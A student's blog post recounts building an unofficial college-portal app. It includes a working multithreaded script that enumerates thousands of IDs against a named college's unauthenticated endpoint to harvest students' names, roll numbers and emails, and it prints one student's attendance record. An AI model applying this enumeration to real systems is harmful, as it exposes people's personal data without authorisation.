Title: DEVS COMPANION APP
Author: Raxen
Date: November 24, 2024

TABLE OF CONTENTS

REC COMPANION APP and how I OVERENGINEERED IT…

PREAMBLE

My college has switched to a new ERP solution, so I think everything I say will be obsolete by the time I publish this blog. Thanks to this project I learnt about API protection and multithreading, and that agriculture seems to be an easier field of work.

WHERE IT ALL STARTED

It was the year 2021 when I joined my college, and I was very curious about all the stuff they had there. Once I finished my first internals, I was shocked to see that my results could be viewed in my college portal, which was accessed through my college mail ID. As a person with a very curious mindset, I got to work figuring out how the backend API works. At that time I didn't have much knowledge of backend and frontend; I was into programming and mostly focused on LeetCode and problem solving. I had some experience reverse engineering my school's Android application.

code lost in time sadly :(

Idea was to create a better frontend

I was using a lot of alternative frontends for popular applications at that time.

So I was thinking it would be cool if I could make a frontend for my college portal that didn't suck.

REVERSE ENGINEERING

By 2022, I wanted to build a better portal for my peers because the official one from college was shit. The backend APIs had zero authentication: you queried them and data was returned. That made it really easy to reverse engineer and build applications around them. In fact, there was already an existing solution as a Telegram bot. Okay, I should just use it and call it a day, right? Wrong. I didn't have Telegram, using a Telegram bot was unintuitive, and I really wanted it to be a standalone application or a website.

0 AUTHENTICATION WAS DONE ON THE BACKEND

Just by going through how the requests work in Chrome/Firefox devtools, in the Network tab I quickly found that they had zero authentication on the API endpoints.

Network request to api endpoints in unified rec

By taking a closer look at the API call, we can figure out that we need to set PersonID to our ID to get our results.

person_id

Hmm… how can I get this PersonID? I mean, surely if I make so much noise brute forcing it they will eventually find out and block me. I mean, they surely have DDoS protections, right… right… right…

NO DDOS PROTECTION

So, I was learning how to do multithreading in Python at the time. I was sure to put my knowledge to the test by writing a quick multithreaded Python script, which I admit is so fucking overkill.

full code at github

util/scraper.py

import json
import concurrent.futures

import requests

# mydb / mycursor are a MySQL connection and cursor created elsewhere
# in the script (e.g. via mysql.connector.connect()).

def add_user(unified_id, rollno, name, email):
    print(f"ADDING USER {rollno} {unified_id} {name} {email}")
    add_user_query = """
    INSERT INTO users (UNIFIED_ID, ROLLNO, NAME, EMAIL) VALUES (%s, %s, %s, %s)
    """
    user_data = (unified_id, rollno, name, email)
    try:
        mycursor.execute(add_user_query, user_data)
        print(f'ADDED: {user_data}')
    except Exception as e:
        print(f"Error adding user {user_data}", e)

def make_request(payload):
    person_id = payload['PersonID']
    URL = 'http://rajalakshmi.in/UI/Modules/Profile/Profile.aspx/GetPersonInfo'
    try:
        response = requests.post(URL, json=payload, timeout=60)
        response.raise_for_status()
        return person_id, response.status_code, response.json()
    except requests.exceptions.HTTPError as errh:
        # raise_for_status() fired, so a response object exists here
        return person_id, response.status_code, f"HTTP Error: {errh}"
    except requests.exceptions.RequestException as err:
        # ConnectionError / Timeout never produce a response,
        # so there is no status code to report
        return person_id, None, f"Request Exception: {err}"

def minigun():
    list_of_users = []
    payloads = [{'PersonID': i} for i in range(35000, 40000)]

    with concurrent.futures.ThreadPoolExecutor(max_workers=80) as executor:
        futures = {
            executor.submit(make_request, payload): payload
            for payload in payloads
        }

        count = 0
        total_count = 0
        for future in concurrent.futures.as_completed(futures):
            payload = futures[future]
            try:
                person_id, status_code, response = future.result()
                print(status_code)
                if status_code == 200:
                    list_of_users.append((person_id, response))
                    print("| FOUND USER: ", count,
                          "| TOTAL TRIES:", total_count, "|")
                    count += 1
            except Exception as e:
                print(f"| Payload: {payload} | Exception occurred: {e} |")

            total_count += 1

    count = 0
    for person_id, data in list_of_users:
        # the endpoint wraps its JSON payload in a 'd' string
        details = json.loads(data['d'])
        try:
            rollnumber = details[0]['RollNumber']
        except (KeyError, IndexError):
            rollnumber = 0
        try:
            email = details[0]['CollegeEmail']
        except (KeyError, IndexError):
            email = ""
        try:
            # clean up stray tabs, double dots and double spaces in names
            name = details[0]['Name'].replace(
                '\t', '').replace('..', '.').replace('  ', ' ')
        except Exception as e:
            print("Exception raised!", e)
            name = ""
        add_user(person_id, rollnumber, name, email)

        # commit every 100 users so a crash loses at most 100 rows
        if count % 100 == 0:
            mydb.commit()
        count += 1

    mydb.commit()
    mydb.close()

On a high level, how it works is: scraper.py creates a shit ton of threads. Each thread makes a request with a different PersonID and waits for a response from the server, which tells it whether that PersonID is valid or invalid. If the PersonID is valid, it gets added to the DB.

PROBLEMS

If the program freezes or my computer dies, the DB data is lost as it wasn't committed. So, I made it commit to the database every 100 person IDs, which makes it easier to recover from crashes.

It was all hacky and done in 30 minutes. So, I know it can be optimized, but it was a fire-once-a-year kind of script and I didn't bother optimizing it that much.

TIME TO GET DATA FROM ENDPOINTS

For some odd reason, every endpoint except attendance and sem results is unprotected. We will get back to those endpoints later; for now:

/get-info/photo/<int:rollno>

/get-info/<int:rollno>

/internal-marks/<int:rollno>

OLD UNIFIED

old-unified-marks

NEW AND IMPROVED

new-devs-companion

/get-sems/<int:rollno>

/sem-marks/<int:rollno>/

/sem-marks/<int:rollno>/<int:sem>

/get-attendacne/<int:rollno>/
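For illustration, here's a minimal sketch of what one of these wrapper routes could look like. This is my assumption, not the project's actual code: I'm assuming Flask (which matches the `<int:rollno>` route syntax above), and `FAKE_DB` is a hypothetical stand-in for the real upstream call/database lookup the backend performs.

```python
from flask import Flask, jsonify

app = Flask(__name__)

# Hypothetical in-memory lookup standing in for the real upstream
# query that the actual backend performs.
FAKE_DB = {
    211001084: {"rollno": 211001084, "name": "RITHESH S"},
}

@app.route("/get-info/<int:rollno>")
def get_info(rollno):
    # Flask's <int:rollno> converter already guarantees an integer here
    record = FAKE_DB.get(rollno)
    if record is None:
        return jsonify({"error": "unknown roll number"}), 404
    return jsonify(record)
```

The nice part of wrapping the upstream API like this is that the frontend only ever talks to routes you control, so you can add your own auth in front of the unauthenticated upstream.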

json_data = {
    "StartDate": st_date,
    "EndDate": today,
    "PersonID": person_id,
}

and will return

[{'ABSENT': 53,
 'AttendanceDate': '22-01-2024',
 'NOTENTER': 0,
 'Name': 'RITHESH  S',
 'P1': None,
 'P2': 'A',
 'P3': 'P',
 'P4': None,
 'P5': 'P',
 'P6': None,
 'P7': None,
 'P8': None,
 'PRESENT': 355,
 'Percentage': 87.0,
 'Period1': '-NE-',
 'Period2': 'A- (IT19642)',
 'Period3': 'P- (IT19643)',
 'Period4': '-NE-',
 'Period5': 'P- (IT19643)',
 'Period6': '-NE-',
 'Period7': '-NE-',
 'Period8': '-NE-',
 'PersonId': 21412,
 'RollNumber': '211001084',
 'TDAYS': 316,
 'TotalAttennd': 408},
{'ABSENT': 53,
 'AttendanceDate': '23-01-2024',
 'NOTENTER': 0,
 'Name': 'RITHESH  S',
 'P1': 'A',
 'P2': 'A',
 'P3': 'P',
 'P4': 'A',
 'P5': 'P',
 'P6': 'A',
 'P7': 'P',
 'P8': None,
 'PRESENT': 355,
 'Percentage': 87.0,
 'Period1': 'A- (IT19P65)',
 'Period2': 'A- (IT19P65)',
 'Period3': 'P- (IT19644)',
 'Period4': 'A- (IT19642)',
 'Period5': 'P- (IT19644)',
 'Period6': 'A- (IT19642)',
 'Period7': 'P- (IT19641)',
 'Period8': '-NE-',
 'PersonId': 21412,
 'RollNumber': '211001084',
 'TDAYS': 316,
 'TotalAttennd': 408}
]
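For illustration (this isn't the project's code), here's a small Python sketch that flattens one day's record using the field names from the sample above, recomputing the overall percentage from PRESENT and TotalAttennd:

```python
def summarize_day(record):
    """Flatten one day's attendance record from the upstream response."""
    # P1..P8 are per-period flags: 'P' present, 'A' absent, None not entered
    periods = [record.get(f"P{i}") for i in range(1, 9)]
    attended = sum(1 for p in periods if p == "P")
    missed = sum(1 for p in periods if p == "A")
    # overall percentage = periods present / total periods conducted
    percentage = round(record["PRESENT"] / record["TotalAttennd"] * 100)
    return {
        "date": record["AttendanceDate"],
        "present_periods": attended,
        "absent_periods": missed,
        "overall_percentage": percentage,
    }

# First record from the sample response above
sample = {
    "AttendanceDate": "22-01-2024",
    "P1": None, "P2": "A", "P3": "P", "P4": None,
    "P5": "P", "P6": None, "P7": None, "P8": None,
    "PRESENT": 355, "TotalAttennd": 408,
}
print(summarize_day(sample))
# {'date': '22-01-2024', 'present_periods': 2, 'absent_periods': 1, 'overall_percentage': 87}
```

Note that 355/408 works out to 87%, matching the `Percentage` field in the sample, which is how I read `PRESENT` and `TotalAttennd` as periods-attended over periods-conducted.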

ACHIEVED FEATURE PARITY WITH OFFICIAL UNIFIED 🎉🎉🎉

This was about 2 years in the making; I worked on this project on and off as it was really my first real passion project. I learnt a lot. This project will always be in my heart.

It was active for around 2 months, then we were running out of money for the server, so we pulled the plug, and subsequently the new ERP came.

3,000 USERS within 1 month, using only word of mouth

We didn't have analytics running for a month, so the true numbers may be above 3K.

I will have missed a lot of things since this project was a long time in the making and I didn't document a lot of the cool shit. Contact me if you wanna know more.

2nd part of the puzzle: the frontend

I decided to go with React + NextUI, cause why not. I also really wanted my application to be a PWA.

Frontend

components used

For local testing I needed this in my middleware.js:

// note: this is the pre-1.0 http-proxy-middleware API;
// newer versions export { createProxyMiddleware } instead
const proxy = require('http-proxy-middleware');

module.exports = function(app) {
  app.use(proxy('/api', {
    target: 'http://backend:9000',
    pathRewrite: {'^/api': ''}
  }));
};

PWA

Somehow I got the Progressive Web App to work, using a caching method so that the user doesn't send a request to the server every time they want something; instead, responses are cached and reused, and network requests are made only when needed.

PLEASE DO NOT DO THIS. READ THE PWA DOCS AND USE SERVICE WORKERS TO PROPERLY CACHE THINGS.

useEffect(() => {
  if (localStorage.getItem("JWT_TOKEN") === null) {
    console.log("NOT LOGGED IN");
    navigate("/login");
  } else {
    setToken(localStorage.getItem("JWT_TOKEN"));
  }
}, []);

the nightmare continues

if (token !== "") {
  if (localStorage.getItem('sem-marks') === null) {
    axios.defaults.headers.common['Authorization'] = `Bearer ${token}`;
    const url = `/api/sem-marks/`;
    axios
      .get(url, {})
      .then(function (response) {
        setData(response.data);
        localStorage.setItem('sem-marks', JSON.stringify(response.data));
        // note: this logs the previous state value, since setData is async
        console.log("grade:", data);
      })
      .catch(function (error) {
        console.log(error);
        localStorage.clear();
        navigate("/login");
      });
  } else {
    setData(JSON.parse(localStorage.getItem("sem-marks")));
  }
}
I later learnt this was not how it's supposed to be done: a service worker (sw.js) can intercept every fetch and run custom caching logic. But everything worked, and with old Unified as the benchmark, anything was better. Great success.

SCREENSHOTS

OLD - UNIFIED

unified-login

unified-homepage

unified-marks

NEW - DEVS COMPANION APP

devs-companion-login

oauth

homepage-made-by-vignesh

attendance

rectransport

sem-marks

internal-marks

events-page-made-by-thiru

360-page-made-by-swayam

WON DESIGN THINKING

design thinking won 2nd place

CONCLUSION

As the project lead of the first technical club of REC, it was such a pleasure to collaborate with everyone and learn together. To more in the future!

GITHUB LINK TO THE PROJECT

learn more about DEVSREC